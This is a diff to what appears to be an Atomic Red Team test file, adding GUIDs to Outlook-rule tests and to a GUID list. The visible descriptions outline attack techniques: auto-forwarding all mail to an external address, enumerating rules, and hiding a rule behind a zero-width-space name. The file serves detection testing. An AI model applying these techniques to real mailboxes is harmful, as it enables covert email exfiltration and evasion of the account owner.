    Creates an Outlook rule that automatically forwards all received emails to
    an external address. Simulates Business Email Compromise (BEC) and insider
@@ -265,7 +265,7 @@ atomic_tests:
 # TEST 4 — COM Object: Enumerate All Existing Rules (Discovery)
 # ============================================================
 - name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
-  auto_generated_guid:
+  auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
  description: |
    Enumerates all Outlook rules configured on the local profile using the
    PowerShell COM object. Simulates the discovery phase where an adversary
@@ -324,7 +324,7 @@ atomic_tests:
 #      quoting mangling the zero-width space byte sequence.
 # ============================================================
 - name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
-  auto_generated_guid:
+  auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
  description: |
    Creates an Outlook rule with a zero-width space as its display name,
    making it appear blank and invisible in the standard Outlook Rules UI.
@@ -1811,3 +1811,8 @@ a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
 6fec8560-ff64-4bbf-bc79-734fea48f7ca
 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
 dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+ffadc988-b682-4a68-bd7e-4803666be637
+bddfd8d4-7687-4971-b611-50a537ab3ab4
+b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+5ff5249a-5807-480e-ab52-c430497a8a25
+cb814cf8-24f2-41dc-a1cd-1c2073276d4a